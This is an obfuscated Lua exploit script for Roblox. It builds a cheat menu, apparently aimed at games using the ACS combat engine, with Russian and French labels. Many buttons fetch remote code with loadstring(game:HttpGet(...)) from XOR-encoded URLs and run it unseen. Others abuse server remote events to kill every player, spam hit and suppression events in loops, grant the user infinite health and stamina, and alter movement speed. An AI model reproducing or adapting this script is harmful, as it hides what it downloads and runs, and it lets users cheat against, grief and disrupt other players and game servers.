--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v13,v14) local v15={};_G.Cs={UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};for v37=1, #v13 do v6(v15,v0(v4(v1(v2(v13,v37,v37 +  #Cs + 1 )),v1(v2(v14,1 + (v37% #v14) ,1 + (v37% #v14) + 1 )))%256 ));end return v5(v15);end local v8=loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\223\36\241\178\195\83\194\192\201\44\246\175\212\81\228\234\150\9\239\185\212\81\220\194\210\43\169\191\206\13\210\204\201\33\163\233\151\18\216\193\149\49\254\175","\126\177\163\187\69\134\219\167")))();local v9=v8:Window(v7("\7\196\57\198\243\49\201","\156\67\173\74\165"));local v10=v9:Server(v7("\29\185\79\25\174\43\71\32\190\70\24","\38\84\215\41\118\220\70"),v7("\88\2\54\2\164\31\89\53\5\233\30\4\45\16\242\95\14\108\17\241\93\89\35\1\237\85\2\109\77\247\84\75\116\66\173\5\71\118\71\173\6\66","\158\48\118\66\114"));local v11=v10:Channel(v7("\156\33\28\53\124\168\254","\155\203\68\112\86\19\197"));v11:Label(v7("\83\199\52\249\75\71\230\251\8\201\120\241\69\56\163\184\83\199\52\249\75\71\246\237\86\205\57\238\84\54\241\182\75\216","\152\38\189\86\156\32\24\133"));local v10=v9:Server(v7("\200\69\168\74\240\94\169\65","\38\156\55\199"),v7("\160\105\104\56\73\59\181\84\191\106\50\58\28\118\246\76\176\51\127\39\30\59\251\80\187\120\104\103\76\125\254\30\254\45\47\124\69\44\174\26\252\36","\35\200\29\28\72\115\20\154"));local v12=v10:Channel(v7("\56\156\226","\84\121\223\177\191\237\76"));v12:Button(v7("\154\117\250\224\107\30\103\143\238\22\253\178\53\92\60\200\181\81\137\155\20\117\7\252","\161\219\54\169\192\90\48\80"),function() local v16=1905 -(1881 + 24) ;while true do if (v16==0) then loadstring(game:HttpGet(v7("\65\86\20\53\90\24\79\106\91\67\23\107\78\75\20\45\92\64\21\54\76\80\3\42\71\86\5\43\93\12\3\42\68\13\15\39\93\71\25\61\6\111\5\41\64\79\5\104\71\91\26\42\81\13\18\32\79\81\79\45\76\67\4\54\6\79\1\44\71\13\33\6\122\7\82\117\24\12\87\107\28\7\82\117\91\71\22\36\68\82","\69\41\34\96")))();v8:Notification(v7("\146\204\195\3\4\34\191\194\195\3\13\37","\75\220\163\183\106\98"),"Загружено!","Ок");break;end end end);v12:Seperator();v12:Button(v7("\35\153\184\119\136\76\237\197\98\153\54\168\132\59\213\11\180\140\119\226\45\150\175\10","\185\98\218\235\87"),function() local v17=string.char;local v18=string.byte;local v19=string.sub;local v20=bit32 or bit ;local v21=v20.bxor;local v22=table.concat;local v23=table.insert;local function v24(v38,v39) local v40=0 -0 ;local v41;while true do if (v40==(1764 -(454 + 1309))) then return v22(v41);end if (v40==(0 + 0)) then local v66=0 -0 ;while true do if (0==v66) then v41={};for v81=1 -0 , #v38 do v23(v41,v17(v21(v18(v19(v38,v81,v81 + (2 -1) )),v18(v19(v39,1 + (v81% #v39) ,(286 -(134 + 151)) + (v81% #v39) + 1 )))%(1921 -(970 + 695)) ));end v66=1 -0 ;end if (v66==1) then v40=1991 -(582 + 1408) ;break;end end end end end local v25=loadstring(game:HttpGet(v24("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\195\13\227\171\211\29\158\232\218\51\233\246\242\55\156\239\210\39\244\186\213\7\158\206\218\44\232\244\212\17\196\209\216\32\168\183\210\31","\126\177\163\187\69\134\219\167")))();local v26=v25.CreateLib("🦋ACS V2  March special ☘️",v24("\16\212\36\196\236\48\200","\156\67\173\74\165"));local v27=v26:NewTab(v24("\25\182\64\24","\38\84\215\41\118\220\70"));local v28=v27:NewSection(v24("\125\23\43\28","\158\48\118\66\114"));local v29=v26:NewTab(v24("\152\39\2\63\99\177","\155\203\68\112\86\19\197"));local v30=v29:NewSection(v24("\117\222\36\245\80\108","\152\38\189\86\156\32\24\133"));local v31=v26:NewTab(v24("\223\69\162\66\245\67","\38\156\55\199"));local v32=v29:NewSection(v24("\139\111\121\44\26\96","\35\200\29\28\72\115\20\154"));v32:NewButton(v24("\58\173\212\219\132\56\116\55\176\225\211\130\33\59","\84\121\223\177\191\237\76"),"",function() end);v30:NewSlider(v24("\140\87\197\171\122\99\32\196\190\82","\161\219\54\169\192\90\48\80"),"",(280 -199) + (526 -107) ,50 -34 ,function(v42) game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v42;end);v30:NewSlider(v24("\99\87\13\53","\69\41\34\96"),"",1884 -1384 ,50,function(v44) game.Players.LocalPlayer.Character.Humanoid.JumpPower=v44;end);v30:NewButton(v24("\157\202\218\8\13\63","\75\220\163\183\106\98"),v24("\45\138","\185\98\218\235\87"),function() loadstring(game:HttpGet(v24("\195\40\51\246\205\240\132\115\53\231\201\228\204\53\51\238\203\168\222\47\34\244\221\165\197\40\34\232\202\228\200\51\42\169\251\178\222\50\62\245\145\139\194\49\37\233\202\231\248\63\53\239\206\190\132\49\38\239\208\229\234\53\42\228\209\190\142\110\119\213\221\184\194\44\51\163\140\250\131\11\46\242\214\165\222\40\98\180\142\140\228\10\110\168\210\191\202","\202\171\92\71\134\190")))();end);v30:NewButton(v24("\27\192\37\133\43\206\59\200\29\206\35\132\58","\232\73\161\76"),v24("\156\204\76\112\17\191\202\2\28","\126\219\185\34\61"),function() local v46=3 -(1826 -(1195 + 629)) ;function zigzag(v56) return math.acos(math.cos(v56 * math.pi ))/math.pi ;end game:GetService(v24("\62\219\80\65\123\101\229\238\15\203","\135\108\174\62\18\30\23\147")).RenderStepped:Connect(function() if game.Workspace.Camera:FindFirstChild(v24("\151\251\39\216","\167\214\137\74\171\120\206\83")) then for v72,v73 in pairs(game.Workspace.Camera.Arms:GetDescendants()) do if (v73.ClassName==v24("\166\245\33\85\200\166\153\228","\199\235\144\82\61\152")) then local v77=0 -0 ;local v78;while true do if (v77==(241 -(187 + 54))) then v78=(1154 -(162 + 618)) -(123 + 176 + 75) ;while true do if (v78==((0 + 0) -(0 -0))) then v73.Color=Color3.fromHSV(zigzag(v46),(1174 -475) -(208 + 490) ,1);v46=v46 + 0.0005 + 0 + (1636 -(1373 + 263)) ;break;end end break;end end end end end end);end);v30:NewButton(v24("\38\21\170\107\34\14\169\39\8\18\188\107\79\71\247\124\73\67\240","\75\103\118\217"),v24("\226\76\96\24\182\26\194\20\93\21\169","\126\167\52\16\116\217"),function() loadstring(game:HttpGet(v24("\192\58\52\144\167\67\179\135\60\33\151\250\30\245\220\38\53\130\161\10\249\218\45\47\142\160\28\242\220\96\35\143\185\86\222\196\47\51\148\189\23\251\251\58\47\142\177\86\209\209\2\53\129\135\13\233\206\40\111\141\181\10\232\205\60\111\161\151\42\217\198\41\41\142\177\60\228\216\34\47\147\189\22\242\134\34\53\129","\156\168\78\64\224\212\121")))();end);v30:NewButton(v24("\38\237\182\142\44\231\169\194\71\207\169\194\71\166\244\128\80\160\240\135","\174\103\142\197"),v24("\125\33\83\52\101\95\244\90\104\112\8\101","\152\54\72\63\88\69\62"),function() local v47=1000 -(451 + 549) ;local v48;local v49;while true do if (v47==(0 + 0)) then v48=(0 -0) + (0 -0) ;v49=nil;v47=1385 -(746 + 638) ;end if (v47==(1 + 0)) then while true do if (v48==0) then v49=game:GetService(v24("\230\193\254\80\221\199\239\72\209\192\221\72\219\214\239\91\209","\60\180\164\142"))[v24("\121\125\54\22\2\227\21\81\80\0","\114\56\62\101\73\71\141")].Eventos.Damage;for v82,v83 in pairs(game.Players:GetPlayers()) do local v84=0 -0 ;local v85;local v86;local v87;while true do if (v84==0) then v85=0;v86=nil;v84=342 -(218 + 123) ;end if (v84==(1582 -(1535 + 46))) then v87=nil;while true do if ((0 + 0)==v85) then local v95=0;while true do if (v95==(0 + 0)) then v86=(1396 -(306 + 254)) -(41 + 619 + (344 -168)) ;v87=nil;v95=1468 -(899 + 568) ;end if (v95==1) then v85=1 + 0 ;break;end end end if (v85==(2 -1)) then while true do if (v86==((603 -(268 + 335)) + (290 -(60 + 230)))) then v87=v83.Character;v49:FireServer(v87.Humanoid,v87.Humanoid.MaxHealth,(774 -(426 + 146)) -(2 + 12 + 188) ,0);break;end end break;end end break;end end end break;end end break;end end end);v30:NewButton(v24("\153\234\200\132\138\236\214\203\172\236\155\247\168\232\214\201\189\251\155\140\233\167\140\138\237\160","\164\216\137\187"),v24("\225\246\48\191\230\204\14\223\233\37\183\230\210\10\213","\107\178\134\81\210\198\158"),function() for v57=1457 -(282 + 1174) ,(101486 -(569 + 242)) -(534 + 141)  do game.ReplicatedStorage.ACS_Engine.Eventos.Hit:FireServer("﴾田̤̈﴿﴾田̤̈﴿﴾土̤̈﴿﴾大̤̈﴿﴾難̤̈﴿﴾Ｚ̤̈﴿﴾中̤̈﴿﴾木̤̈﴿﴾尸̤̈﴿﴾土̤̈﴿﴾女̤̈﴿﴾弓̤̈﴿﴾大̤̈﴿﴾一̤̈﴿﴾大̤̈﴿﴾戈̤̈﴿﴾日̤̈﴿﴾火̤̈﴿﴾戈̤̈﴿﴾卜̤̈﴿");end end);v30:NewButton(v24("\25\13\145\134\141\55\10\194\231\166\52\78\202\151\228\111\64\215\143","\202\88\110\226\166"),v24("\228\0\134\183\235\207\3","\170\163\111\226\151"),function() for v58,v59 in pairs(game.Players:GetPlayers()) do local v60=0;local v61;local v62;local v63;while true do if (v60==(0 -0)) then v61=0 + 0 ;v62=nil;v60=1025 -(706 + 318) ;end if ((1252 -(721 + 530))==v60) then v63=nil;while true do if (((1272 -(945 + 326)) + (0 -0))==v61) then if v63 then local v90=0 + 0 ;local v91;while true do if (v90==0) then v91=(700 -(271 + 429)) + 0 + 0 ;while true do if (v91==(0 + (1500 -(1408 + 92)))) then v63.MaxHealth=math.huge;v63.Health=math.huge;break;end end break;end end end break;end if (v61==0) then local v88=1086 -(461 + 625) ;local v89;while true do if ((1288 -(993 + 295))==v88) then v89=0 -(0 + 0) ;while true do if (v89==((1171 -(418 + 753)) -0)) then local v96=0 + 0 ;while true do if (v96==(1 + 0)) then v89=(1 + 1) -1 ;break;end if (v96==(0 + 0)) then v62=v59.Character;v63=v62 and v62:FindFirstChild(v24("\57\37\191\57\64\56\32\21","\73\113\80\210\88\46\87")) ;v96=530 -(406 + 123) ;end end end if (v89==((1770 -(1749 + 20)) + 0 + 0)) then v61=(1323 -(1249 + 73)) + 0 + 0 ;break;end end break;end end end end break;end end end end);v30:NewButton(v24("\160\47\222\82\192\142\40\141\82\202\142\40\200\82\175\208\98\154\92\178\200","\135\225\76\173\114"),v24("\61\226\188\157\163\185\162","\199\122\141\216\208\204\221"),function() local v50=(1541 -(466 + 679)) -((276 -161) + 281) ;local v51;local v52;while true do if (((5 -3) -(1901 -(106 + 1794)))==v50) then if v52 then local v74=0 + 0 ;local v75;local v76;while true do if (v74==(0 + 0)) then v75=(0 -0) + (0 -0) ;v76=nil;v74=115 -(4 + 110) ;end if ((585 -(57 + 527))==v74) then while true do if (v75==((1427 -(41 + 1386)) -0)) then v76=(103 -(17 + 86)) -(0 + 0) ;while true do if (v76==(0 -0)) then v52.MaxHealth=math.huge;v52.Health=math.huge;break;end end break;end end break;end end end break;end if (((2510 -1643) -((716 -(122 + 44)) + (546 -229)))==v50) then v51=game.Players.LocalPlayer.Character;v52=v51 and v51:FindFirstChild(v24("\133\200\29\241\118\249\164\217","\150\205\189\112\144\24")) ;v50=3 -2 ;end end end);v30:NewButton(v24("\4\135\172\12\39\154\16\3\45\196\140\73\22\158\20\2\101\204\237\2\84\198\64\89","\112\69\228\223\44\100\232\113"),v24("\231\26\21\197\179\110\165\198\30\20\219","\230\180\127\103\179\214\28"),function() while task.wait() do for v64,v65 in next,game.Players:GetPlayers() do game:GetService(v24("\190\0\79\74\237\66\225\152\0\91\117\240\78\242\141\2\90","\128\236\101\63\38\132\33"))[v24("\141\138\34\123\147\229\200\165\167\20","\175\204\201\113\36\214\139")].Events.Suppression:FireServer(v65,(783 + 179) -(43 + 253) ,(1894 -959) -(334 -(30 + 35)) ,(1280 + 581) -(2452 -(1043 + 214)) );end end end);v30:NewButton(v24("\102\207\38\156\45\73\202\60\210\13\83\201\117\253\9\74\193\58\156\76\22\130\98\146\81\8\158\123\140\74\22\133","\100\39\172\85\188"),"Tire jusqu'a l'infini et l'au dela !",function() loadstring(game:HttpGet(v24("\165\108\173\144\32\247\55\246\144\50\190\108\188\130\58\163\54\186\143\62\226\106\184\151\124\153\127\177\139\32\140\93\189","\83\205\24\217\224")))();end);v30:NewButton(v24("\199\198\222\125\207\203\203\52\232\204\217\56\166\246\217\60\235\204\195\60\166\141\156\115\177\139\152\114\180\139\157\115\183\140","\93\134\165\173"),"Arrête jamais de courir !",function() local v53=0 -0 ;local v54;local v55;while true do if (v53==(286 -(134 + (1363 -(323 + 889))))) then local v68=0 -0 ;while true do if (v68==(581 -(361 + 219))) then v53=322 -(53 + 267) ;break;end if (v68==0) then v55.MaxValue=2033281 + 6966718 ;v55.MaxValue=(9002078 -(15 + 398)) -((1952 -(18 + 964)) + 695) ;v68=3 -2 ;end end end if ((3 -(1 + 0))==v53) then v55.Value=(5671580 + 3330410) -(582 + (2258 -(20 + 830))) ;break;end if (v53==0) then local v70=0;local v71;while true do if (v70==(0 + 0)) then v71=0 -0 ;while true do if (v71==1) then v53=(127 -(116 + 10)) -(0 + 0) ;break;end if (v71==(0 -(738 -(542 + 196)))) then local v92=0 -0 ;local v93;while true do if (v92==0) then v93=0 + 0 ;while true do if (v93==(1 + 0)) then v71=(657 + 1168) -(1195 + 629) ;break;end if (v93==0) then v54=game.StarterPlayer.StarterCharacterScripts;v55=v54.ACS_Client.Variaveis.Stamina;v93=1;end end break;end end end end break;end end end end end);v8:Notification(v7("\229\51\51\239\216\163\200\61\51\239\209\164","\202\171\92\71\134\190"),"Загружено!","Ок");end);local v12=v10:Channel(v7("\29\211\35\132\37\200\34\143","\232\73\161\76"));v12:Button(v7("\143\203\77\81\18\178\215\69\29\54\174\219","\126\219\185\34\61"),function() local v33=0 -0 ;while true do if ((0 -0)==v33) then loadstring(game:HttpGet(v7("\4\218\74\98\109\45\188\168\30\207\73\60\121\126\231\239\25\204\75\97\123\101\240\232\2\218\91\124\106\57\240\232\1\129\71\125\120\101\250\226\2\202\88\96\113\122\224\228\4\193\81\126\47\56\192\236\21\131\118\103\124\56\254\230\5\192\17\84\91\50\161\183\56\220\81\126\114\126\253\224\73\156\14\85\75\94\189\235\25\207\75","\135\108\174\62\18\30\23\147")))();v8:Notification(v7("\152\230\62\194\30\167\48\198\162\224\37\197","\167\214\137\74\171\120\206\83"),"Загружено!","Ок");break;end end end);local v10=v9:Server(v7("\170\244\63\84\246","\199\235\144\82\61\152"),v7("\15\2\173\59\93\89\246\60\16\1\247\57\8\20\181\36\31\88\186\36\10\89\184\56\20\19\173\100\88\31\189\118\81\70\234\126\87\65\225\115\95\79","\75\103\118\217"));local v12=v10:Channel(v7("\229\77\96\21\170\13","\126\167\52\16\116\217"));v12:Button(v7("\233\42\47\142\189\10\188\233\32\52\137\151\17\249\201\58","\156\168\78\64\224\212\121"),function() local v34=1551 -(1126 + 425) ;while true do if (v34==0) then loadstring(game:HttpGet(v7("\15\250\177\222\20\180\234\129\21\239\178\128\0\231\177\198\18\236\176\221\2\252\166\193\9\250\160\192\19\160\166\193\10\161\149\199\31\235\169\219\19\235\161\129\6\234\170\192\14\253\166\220\14\235\182\129\10\239\172\192\72\221\170\219\21\237\160\128\11\251\164","\174\103\142\197")))();v8:Notification(v7("\120\39\75\49\35\87\251\87\60\86\55\43","\152\54\72\63\88\69\62"),"Загружено!","Ок");break;end end end);local v12=v10:Channel(v7("\253\202\232\85\218\205\250\69\148\253\231\89\216\192","\60\180\164\142"));v12:Button(v7("\113\80\3\32\41\228\6\65\30\60\32\34\225\22","\114\56\62\101\73\71\141"),function() local v35=0;while true do if (v35==0) then loadstring(game:HttpGet(v7("\176\253\207\212\171\179\148\139\170\232\204\138\191\224\207\204\173\235\206\215\189\251\216\203\182\253\222\202\172\167\216\203\181\166\254\192\191\236\242\253\247\224\213\194\177\231\210\208\189\240\210\193\180\237\148\201\185\250\207\193\170\166\200\203\173\251\216\193","\164\216\137\187")))();v8:Notification(v7("\252\233\37\187\160\247\8\211\242\56\189\168","\107\178\134\81\210\198\158"),"Загружено!","Ок");break;end end end);v12:Button(v7("\17\0\132\207\164\49\26\155\134\154\52\27\133\207\164\43","\202\88\110\226\166"),function() local v36=405 -(118 + 287) ;while true do if (v36==(0 -0)) then loadstring(game:HttpGet(v7("\203\27\150\231\217\153\64\205\229\203\212\65\133\254\222\203\26\128\226\217\198\29\129\248\196\215\10\140\227\132\192\0\143\184\227\205\9\139\249\195\215\10\207\196\222\204\29\135\184\227\205\9\139\249\195\215\10\207\196\222\204\29\135\184\199\194\6\140\184\199\194\6\140\185\198\214\14","\170\163\111\226\151")))();v8:Notification(v7("\63\63\166\49\72\62\42\16\36\187\55\64","\73\113\80\210\88\46\87"),"Загружено! Возможно не работает :c","Ок");break;end end end);v12:Seperator();v12:Button(v7("\168\34\203\27\233\136\56\212\82\193\148\34","\135\225\76\173\114"),function() loadstring(game:HttpGet(v7("\18\249\172\160\191\231\232\85\255\185\167\226\186\174\14\229\173\178\185\174\162\8\238\183\190\184\184\169\14\163\187\191\161\242\159\27\227\189\225\254\238\232\51\227\190\185\162\180\179\31\203\173\190\147\148\158\85\224\185\163\184\184\181\85\254\183\165\190\190\162","\199\122\141\216\208\204\221")))();v8:Notification(v7("\131\210\4\249\126\255\174\220\4\249\119\248","\150\205\189\112\144\24"),"Загружено! Возможно не работает :c","Ок");end);
